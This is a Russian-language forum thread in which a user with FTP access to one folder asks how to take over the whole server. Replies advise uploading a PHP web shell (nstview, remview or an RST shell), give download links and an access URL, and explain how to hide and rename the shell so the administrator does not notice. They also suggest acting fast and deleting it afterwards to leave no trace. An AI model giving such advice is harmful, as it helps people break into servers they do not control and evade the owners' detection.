Скажите пожалуйста, имаю доступ к фтп (определённая папка), что мне необходимо сделать, чтобы получить достпу ко всему фтп?
Если с поддержкой пхп (хотя если у тебя есть свой фтп аккаунт то наверное с поддержкой) то залей шелл просто - через него рули дальше сайтом. nstview - имхо лучший шелл. скачать можно http://www.stardozor.org/nstview.zip
см выше я в первом посте ссылку повесил. Ну чтоб он не заметил засунь куда-нить поглубже этот шелл. Переименуй чтоб в глаза не бросался.
Загружаеш на ftp (если конечно у тебя есть права загужать файлы)! Загружаеш его например в папку www ... в адресе пишеш: Http://site.com/remview.php
скачал бы лучше шел от rst => www.rst.void.ru !!!! а если в одном городе живешь с ним то по голове дадут, когда вечером за хлебушком пойдёшь =)))
Хорошо, а узнать о том, что на сервере появился шелл, админ сможет только если заметит его? Могу ли я его залить, проделать необходимые мне манипуляции, а затем удалить и никто ничего не заметит?
да конечно можешь, самое главное чтобы он ничего не заметил..... а вообще админ если он хороший всегда узнает об изменениях на сайте но если все делать быстро то он ничего не заметит !!! =))